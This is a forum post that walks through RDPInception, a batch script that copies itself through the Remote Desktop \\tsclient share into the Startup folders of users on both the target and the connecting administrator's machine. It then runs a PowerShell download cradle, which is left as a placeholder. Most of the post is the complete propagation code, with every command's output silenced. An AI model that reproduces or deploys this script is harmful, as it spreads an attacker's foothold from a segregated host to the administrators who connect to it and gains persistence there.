Windows > General Windows

How RDPInception Works

(1/1)

sujitht:
Remote Desktop is often used by Systems Administrators to remotely manage machines. In a lot of organisations this could mean that a machine is placed in a DMZ or segregated part of the network that should not require any TCP port access other than TCP 3389 into the network segment.

The proof of concept for RDPInception is a relatively simple batch script, the details of which we will walk through below:

Switches off echo.

--- Code: ---@echo off
--- End code ---
Puts a short timer to ensure that tsclient is mounted.

--- Code: ---timeout 1 >nul 2>&1
--- End code ---
Makes a temp directory on both the visiting machine and the target.

--- Code: ---mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
--- End code ---
Copies this file into the directories.

--- Code: ---copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
--- End code ---
Ensure a text file does not exist in %TEMP%

--- Code: ---del /q %TEMP%\temp_00.txt >nul 2>&1
--- End code ---
Scans for startup directories on both the visiting machine and the target.

--- Code: ---set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
echo|%dirs2%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
--- End code ---
Runs through each path and attempts to propagate the file to it.

--- Code: ---for /F “tokens=*” %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat “%%a” >nul 2>&1
copy C:\temp\run.bat “%%a” >nul 2>&1
copy \\tsclient\c\temp\run.bat “%%a” >nul 2>&1
)
--- End code ---
Cleans up %TEMP% file

--- Code: ---del /q %TEMP%\temp_00.txt >nul 2>&1
--- End code ---
Execute the PowerShell download cradle.

--- Code: ---powershell.exe <cradle here>
--- End code ---

Navigation

[0] Message Index